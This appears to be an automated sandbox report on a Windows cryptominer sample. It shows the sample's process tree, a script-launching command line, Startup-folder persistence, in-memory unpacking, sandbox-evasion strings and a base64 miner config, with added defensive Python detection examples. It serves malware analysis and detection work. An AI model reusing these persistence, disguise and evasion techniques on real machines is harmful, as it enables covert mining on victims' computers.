                        Source: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe | Code function: String function: 035D16E0 appears 63 times
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: String function: 00402F80 appears 35 times
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: String function: 004016E0 appears 63 times
                        Source: P7Oa6i5muL.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: P7Oa6i5muL.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: P7Oa6i5muL.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: P7Oa6i5muL.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: P7Oa6i5muL.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: P7Oa6i5muL.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: csrss.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: csrss.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: csrss.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: P7Oa6i5muL.exe, 00000000.00000002.232059263.0000000007F00000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs P7Oa6i5muL.exe
                        Source: P7Oa6i5muL.exe, 00000000.00000002.230495964.0000000007830000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs P7Oa6i5muL.exe
                        Source: P7Oa6i5muL.exe, 00000000.00000002.218256133.0000000002DF1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename vs P7Oa6i5muL.exe
                        Source: P7Oa6i5muL.exe, 00000000.00000002.217311016.0000000000ABC000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamenotepad.exe. vs P7Oa6i5muL.exe
                        Source: P7Oa6i5muL.exe, 00000000.00000002.231934971.0000000007EA0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDvuwpmnvbghzvmybzii.dll" vs P7Oa6i5muL.exe
                        Source: P7Oa6i5muL.exe, 00000000.00000002.231068157.0000000007CB0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs P7Oa6i5muL.exe
                        Source: P7Oa6i5muL.exe, 00000005.00000002.471130550.0000000003B50000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs P7Oa6i5muL.exe
                        Source: P7Oa6i5muL.exe, 00000005.00000002.465011248.0000000000A4C000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamenotepad.exe. vs P7Oa6i5muL.exe
                        Source: P7Oa6i5muL.exe | Binary or memory string: OriginalFilenamenotepad.exe. vs P7Oa6i5muL.exe
                        Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mlang.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
                        Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
                        Source: P7Oa6i5muL.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url, type: DROPPED | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
                        Source: classification engine | Classification label: mal100.expl.evad.mine.winEXE@25/17@2/4
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Code function: 5_2_004080E0 DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,FreeLibrary, | 5_2_004080E0
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\P7Oa6i5muL.exe.log
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Mutant created: \Sessions\1\BaseNamedObjects\e9c1286a28d82a2d0ee6
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4676:120:WilError_01
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1092:120:WilError_01
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | File created: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                        Source: P7Oa6i5muL.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Windows\notepad.exe | File read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\notepad.exe | File read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
                        Source: P7Oa6i5muL.exe | Virustotal: Detection: 20%
                        Source: P7Oa6i5muL.exe | ReversingLabs: Detection: 20%
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | File read: C:\Users\user\Desktop\P7Oa6i5muL.exe
                        Source: unknown | Process created: C:\Users\user\Desktop\P7Oa6i5muL.exe 'C:\Users\user\Desktop\P7Oa6i5muL.exe'
                        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Process created: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Process created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                        Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeProcess created: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeProcess created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: P7Oa6i5muL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: P7Oa6i5muL.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: P7Oa6i5muL.exeStatic file information: File size 2241536 > 1048576
                        Source: P7Oa6i5muL.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x208800
                        Source: P7Oa6i5muL.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: P7Oa6i5muL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
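The process tree above is what a detection rule would key on: the Desktop binary re-launching a copy of itself from %TEMP%, that copy starting notepad.exe with a -c <config> argument that notepad.exe does not understand (it is XMRig's --config switch), and cmd.exe /C WScript on a .vbs under C:\ProgramData. The following is an added example, not part of the Joe Sandbox report: it applies those three rules to process-creation records constructed from the command lines listed above. The PIDs and parent links are assumed, since the report gives only the parent and child images.

```python
import re

# Process-creation records built from the command lines listed in the report.
# PIDs and parent/child links are assumed for the example; the report shows
# the parent and child images but not the process IDs.
EVENTS = [
    {"pid": 4100, "ppid": 900,  "image": r"C:\Users\user\Desktop\P7Oa6i5muL.exe",
     "cmdline": r"'C:\Users\user\Desktop\P7Oa6i5muL.exe'"},
    {"pid": 4120, "ppid": 4100, "image": r"C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe"},
    {"pid": 4140, "ppid": 4120, "image": r"C:\Windows\notepad.exe",
     "cmdline": r"'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'"},
    {"pid": 4160, "ppid": 4120, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'"},
    {"pid": 4180, "ppid": 4160, "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r"WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'"},
    {"pid": 1040, "ppid": 700,  "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Directories any user can write to; a script or a self-copy launched from
# one of these deserves a look.
WRITABLE_MARKERS = ("c:\\programdata\\", "\\appdata\\local\\temp\\", "\\appdata\\roaming\\")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def split_cmdline(cmdline):
    """Split a command line into arguments. The report renders quoted
    arguments with single quotes, so that is what is honoured here."""
    return [tok.strip("'") for tok in re.findall(r"'[^']*'|\S+", cmdline)]


def in_writable_dir(path):
    p = path.lower()
    return any(marker in p for marker in WRITABLE_MARKERS)


def ancestry(by_pid, pid):
    """Image names from the process up to the oldest ancestor the events know."""
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def find_suspicious(events):
    """Return (pid, rule, ancestry) for every record that trips a rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        args = split_cmdline(e["cmdline"])[1:]
        parent = by_pid.get(e["ppid"])
        # 1. notepad.exe takes a document path, not switches. "-c <file>" is
        #    XMRig's --config option, i.e. the command line of the miner that
        #    was placed inside notepad.exe.
        if name == "notepad.exe" and any(a.startswith("-") for a in args):
            findings.append((e["pid"], "notepad_with_switches", ancestry(by_pid, e["pid"])))
        # 2. A script host running a script out of ProgramData/AppData/Temp.
        if name in SCRIPT_HOSTS and any(in_writable_dir(a) for a in args):
            findings.append((e["pid"], "script_from_writable_dir", ancestry(by_pid, e["pid"])))
        # 3. A binary re-launching a copy of itself from a writable directory.
        if (parent and basename(parent["image"]) == name
                and in_writable_dir(e["image"])
                and parent["image"].lower() != e["image"].lower()):
            findings.append((e["pid"], "self_copy_relaunch", ancestry(by_pid, e["pid"])))
    return findings


if __name__ == "__main__":
    for pid, rule, chain in find_suspicious(EVENTS):
        print(f"{pid:>5}  {rule:<26}  {' <- '.join(chain)}")
```

The three fields the rules use (image, parent image, command line) are exactly what Sysmon Event ID 1 or an EDR process-start event carries, so the same logic ports directly to a SIEM query; the svchost.exe record is included as the negative case.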

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: Unpacked PE file: 5.2.P7Oa6i5muL.exe.3320000.3.unpack
.NET source code contains potential unpacker (an AppDomain.AssemblyResolve handler that returns Assembly.Load(byte[]) is how a .NET crypter hands the runtime a decrypted payload assembly straight from memory, without writing it to disk)
Source: P7Oa6i5muL.exe, Bmfkrppdfe/SmsService.cs :: .Net Code: CurrentDomain_AssemblyResolve System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: P7Oa6i5muL.exe, Bmfkrppdfe/SmsService.cs :: .Net Code: <CurrentDomain_AssemblyResolve>b__2_0 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: P7Oa6i5muL.exe.0.dr, Bmfkrppdfe/SmsService.cs :: .Net Code: CurrentDomain_AssemblyResolve System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: P7Oa6i5muL.exe.0.dr, Bmfkrppdfe/SmsService.cs :: .Net Code: <CurrentDomain_AssemblyResolve>b__2_0 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.P7Oa6i5muL.exe.8b0000.0.unpack, Bmfkrppdfe/SmsService.cs :: .Net Code: CurrentDomain_AssemblyResolve System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.P7Oa6i5muL.exe.8b0000.0.unpack, Bmfkrppdfe/SmsService.cs :: .Net Code: <CurrentDomain_AssemblyResolve>b__2_0 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.P7Oa6i5muL.exe.8b0000.0.unpack, Bmfkrppdfe/SmsService.cs :: .Net Code: CurrentDomain_AssemblyResolve System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.P7Oa6i5muL.exe.8b0000.0.unpack, Bmfkrppdfe/SmsService.cs :: .Net Code: <CurrentDomain_AssemblyResolve>b__2_0 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: csrss.5.dr, Bmfkrppdfe/SmsService.cs :: .Net Code: CurrentDomain_AssemblyResolve System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: csrss.5.dr, Bmfkrppdfe/SmsService.cs :: .Net Code: <CurrentDomain_AssemblyResolve>b__2_0 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.P7Oa6i5muL.exe.840000.2.unpack, Bmfkrppdfe/SmsService.cs :: .Net Code: CurrentDomain_AssemblyResolve System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.P7Oa6i5muL.exe.840000.2.unpack, Bmfkrppdfe/SmsService.cs :: .Net Code: <CurrentDomain_AssemblyResolve>b__2_0 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.P7Oa6i5muL.exe.840000.0.unpack, Bmfkrppdfe/SmsService.cs :: .Net Code: CurrentDomain_AssemblyResolve System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.P7Oa6i5muL.exe.840000.0.unpack, Bmfkrppdfe/SmsService.cs :: .Net Code: <CurrentDomain_AssemblyResolve>b__2_0 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: P7Oa6i5muL.exe :: Static PE information: 0x91544293 [Sun Apr 7 02:53:07 2047 UTC] (compile timestamp in the future)
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: Code function: 5_2_004080E0 DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,FreeLibrary,5_2_004080E0
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe :: Code function: 0_2_008B8493 pushfd ; iretd 0_2_008B8494
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe :: Code function: 0_2_008B86DE push esi; ret 0_2_008B86DF
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe :: Code function: 0_2_008B67EA push esi; ret 0_2_008B67EB
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe :: Code function: 0_2_008B862A push FFFFFFD9h; retf 0_2_008B8632
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe :: Code function: 0_2_008B702D push EE858C9Dh; retf 0_2_008B703D
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe :: Code function: 0_2_008B7333 push 56C9B3D3h; ret 0_2_008B7359
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe :: Code function: 0_2_008B736B push esi; ret 0_2_008B7359
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: Code function: 5_2_00848493 pushfd ; iretd 5_2_00848494
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: Code function: 5_2_008486DE push esi; ret 5_2_008486DF
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: Code function: 5_2_008467EA push esi; ret 5_2_008467EB
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: Code function: 5_2_0084702D push EE858C9Dh; retf 5_2_0084703D
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: Code function: 5_2_0084862A push FFFFFFD9h; retf 5_2_00848632
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: Code function: 5_2_00847333 push 56C9B3D3h; ret 5_2_00847359
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: Code function: 5_2_0084736B push esi; ret 5_2_00847359
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: File created: C:\ProgramData\LKBNMTFJgl\csrss (3 occurrences; dropped file)
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe :: File created: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe (dropped file)
Source: C:\Windows\SysWOW64\wscript.exe :: File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url (2 occurrences)
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe :: Process information set: NOOPENFILEERRORBOX (40 occurrences)
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (2 occurrences)
Source: C:\Windows\notepad.exe :: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe :: Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\conhost.exe :: Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe :: Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (2 occurrences)
Source: C:\Windows\SysWOW64\wscript.exe :: Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe :: Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe :: Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe :: Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\svchost.exe :: Process information set: NOOPENFILEERRORBOX (2 occurrences)
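The Startup-folder .url file written by wscript.exe above (and matched by the Methodology_Contains_Shortcut_OtherURIhandlers rule earlier on this page) is persistence through an Internet Shortcut: at logon the shell opens whatever URL= the file names, and a file: or drive-letter target, or a non-web URI handler, launches a local program rather than a web page. The following is an added example, not from the Joe Sandbox report or the sample: it parses .url content, flags targets that are not web pages, and includes a hunt helper for both Startup folders. The report does not show what viTRMUuKeV.url points at, so the sample contents below are constructed and the file:/// and drive-letter targets are hypothetical.

```python
import configparser
import os
import re
from urllib.parse import urlsplit

WEB_SCHEMES = {"http", "https"}


def classify_url_shortcut(text):
    """Classify the target of an Internet Shortcut (.url) file.

    Returns (verdict, target) where verdict is one of
      "web"          - http/https URL, the only thing a bookmark needs
      "local_target" - file:, a drive-letter path or a UNC path: opens a local file
      "uri_handler"  - any other scheme, dispatched to a registered protocol handler
      "no_target"    - no URL= entry
      "unparseable"  - not INI-shaped at all
    """
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(text)
    except configparser.Error:
        return ("unparseable", None)
    url = parser.get("InternetShortcut", "URL", fallback="").strip()
    if not url:
        return ("no_target", None)
    scheme = urlsplit(url).scheme.lower()      # "C:\..." parses as scheme "c"
    if scheme in WEB_SCHEMES:
        return ("web", url)
    if scheme == "file" or re.fullmatch(r"[a-z]", scheme) or url.startswith("\\\\"):
        return ("local_target", url)
    return ("uri_handler", url)


def scan_startup_folders():
    """Hunt helper for a live Windows host: every .url in the per-user and
    all-users Startup folders whose target is not a web page. Not exercised
    offline; the folder locations are the standard ones."""
    folders = [
        os.path.join(os.environ.get("APPDATA", ""),
                     r"Microsoft\Windows\Start Menu\Programs\Startup"),
        os.path.join(os.environ.get("PROGRAMDATA", ""),
                     r"Microsoft\Windows\Start Menu\Programs\StartUp"),
    ]
    hits = []
    for folder in folders:
        if not os.path.isdir(folder):
            continue
        for name in os.listdir(folder):
            if not name.lower().endswith(".url"):
                continue
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8-sig", errors="replace") as fh:
                verdict, target = classify_url_shortcut(fh.read())
            if verdict != "web":
                hits.append((path, verdict, target))
    return hits


# Constructed .url contents. The report shows only that wscript.exe wrote
# viTRMUuKeV.url to the Startup folder, not what it contains; the file:///
# and drive-letter targets below are hypothetical.
SAMPLES = {
    "bookmark": "[InternetShortcut]\nURL=https://www.example.com/\n",
    "file_uri": "[InternetShortcut]\nURL=file:///C:/ProgramData/LKBNMTFJgl/csrss\nIconIndex=0\n",
    "drive_path": "[InternetShortcut]\nURL=C:\\ProgramData\\LKBNMTFJgl\\r.vbs\n",
    "handler": "[InternetShortcut]\nURL=calculator:\n",
    "junk": "this is not a shortcut\n",
}

if __name__ == "__main__":
    for label, text in SAMPLES.items():
        print(f"{label:<11} {classify_url_shortcut(text)}")
```

Anything other than "web" in a Startup folder is worth pulling for review; a legitimate bookmark has no reason to live there at all.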

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: P7Oa6i5muL.exe, 00000000.00000002.218256133.0000000002DF1000.00000004.00000001.sdmp :: Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE (three adjacent strings run together: the Sandboxie DLL name, the Win32_BIOS WMI query and an error message)
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe :: Thread delayed: delay time: 922337203685477 (TimeSpan.MaxValue in milliseconds, i.e. an indefinite sleep)
Source: C:\Windows\SysWOW64\wscript.exe :: Window found: window name: WSH-Timer
Source: C:\Windows\notepad.exe :: Window / User API: threadDelayed 9995
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe TID: 5944 :: Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe TID: 4464 :: Thread sleep count: 53 > 30
Source: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe TID: 4464 :: Thread sleep time: -106000s >= -30000s
Source: C:\Windows\notepad.exe TID: 5064 :: Thread sleep count: 9995 > 30
Source: C:\Windows\System32\svchost.exe TID: 4060 :: Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5700 :: Thread sleep time: -270000s >= -30000s
Source: C:\Windows\System32\svchost.exe :: File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe :: Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: Code function: 5_2_00403CA0 NtClose,GetSystemInfo,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,5_2_00403CA0
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe :: Thread delayed: delay time: 922337203685477
Source: P7Oa6i5muL.exe, 00000000.00000002.218256133.0000000002DF1000.00000004.00000001.sdmp :: Binary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem (a hypervisor-vendor regex adjacent to the Win32_ComputerSystem WMI query)
Source: P7Oa6i5muL.exe, 00000005.00000002.466131413.0000000001100000.00000004.00000020.sdmp :: Binary or memory string: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiA0DQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQkiYXJnb24yL2NodWt3YSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJhcmdvbjIvd3JreiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeCI6ICJjcHUt